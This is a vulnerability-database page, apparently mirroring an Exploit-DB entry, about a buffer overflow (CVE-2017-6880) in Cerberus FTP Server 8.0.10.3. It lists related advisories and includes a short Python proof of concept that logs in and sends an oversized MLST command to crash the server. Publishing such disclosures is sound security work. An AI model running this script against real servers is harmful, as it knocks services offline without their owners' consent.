Lucene search
K

Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow (PoC)

🗓️ 16 Mar 2017 00:00:00Reported by Nassim AsrirType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

Cerberus FTP Server 8.0.10.3 Remote Buffer Overflow by Sending 'MLST' Command with Bad Character

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow Vulnerability
17 Mar 201700:00
zdt
CNVD
Cerberus FTP Server Remote Buffer Overflow Vulnerability (CNVD-2017-08299)
12 May 201700:00
cnvd
CVE
CVE-2017-6880
17 Mar 201717:00
cve
Cvelist
CVE-2017-6880
17 Mar 201717:00
cvelist
EUVD
EUVD-2017-15934
7 Oct 202500:30
euvd
exploitpack
Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)
16 Mar 201700:00
exploitpack
NVD
CVE-2017-6880
17 Mar 201717:59
nvd
OSV
CVE-2017-6880
17 Mar 201717:59
osv
Packet Storm
Cerberus FTP 8.0.10.3 MLST Buffer Overflow
15 May 201700:00
packetstorm
Prion
Buffer overflow
17 Mar 201717:59
prion
Rows per page
[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-6880

Vendor:
===============

https://www.cerberusftp.com/
  
 
Download:
===========

https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
 
 
Vulnerability Type:
===================

Remote Buffer Overflow.


issue:
===================

This problem happens when the Attacker send the bad char "A" in the command "MLST" (2047).
 
POC:
===================
#Simple POC by Nassim Asrir from Henceforth.
import socket
bad_char = "A"*2047
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.81',21))
s.recv(1024)
s.send('USER nassim\r\n')
s.recv(1024)
s.send('PASS mypass\r\n')
s.recv(1024)
s.send('MLST ' + bad_char + '\r\n')
s.close()

https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
 
Tested on:
=============== 

Windows 7 Sp1 (64 Bit)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Mar 2017 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
CVSS 39.8
EPSS0.0552
30